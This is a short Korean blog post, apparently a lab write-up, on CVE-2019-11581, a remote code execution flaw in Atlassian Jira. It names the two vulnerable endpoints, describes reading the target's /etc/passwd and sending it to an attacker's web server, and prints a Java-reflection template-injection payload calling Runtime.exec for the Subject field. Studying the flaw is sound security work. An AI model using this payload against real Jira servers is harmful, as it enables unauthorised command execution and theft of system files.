의미없는 블로그
[CVE-2019-11581] Atlassian Jira RCE 취약점 본문
https://hub.docker.com/r/cptactionhank/atlassian-jira
https://medium.com/@ruvlol/rce-in-jira-cve-2019-11581-901b845f0f
취약 포인트가 2개인데
/secure/ContactAdministrators!default.jspa → 관리자 연락 양식 ON(Default OFF), 로그인은 불필요
/secure/admin/SendBulkMail!default.jspa → 관리자 로그인 필요
전제조건
위에 관리자 연락 양식 ON 되어 있으면 인증없이 취약 페이지에 접근 가능함
Subject 란이 취약 포인트이므로 여기에 원격 명령어 실행 코드 작성한다
(타겟의 /etc/passwd 읽어와서 공격자의 웹 서버에 pentest.html 란 파일로 생성하여 올리는 코드)
공격자의 웹 서버에 pentest.html 생성됨~
PoC
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('').waitFor()
두번째 취약 페이지도 제목란이 취약
여기에 동일하게 PoC 테스트 가능하다
'# 나 > exploit CVE' 카테고리의 다른 글
[CVE-2019-3394] Confluence Server Local File Disclosure 취약점 (0) | 2019.08.30 |
---|---|
[CVE-2014-0160] HeartBleed OpenSSL 1.0.1e 설치 (0) | 2019.08.23 |
[Docker] 파일복붙/Dockerfile 사용하기/별첨 CVE-2018-9206 (0) | 2019.06.26 |
[Docker] 컨테이너 생성/실행/접속 (1) | 2019.06.24 |
[Docker] 설치쓰 (0) | 2019.06.21 |
Comments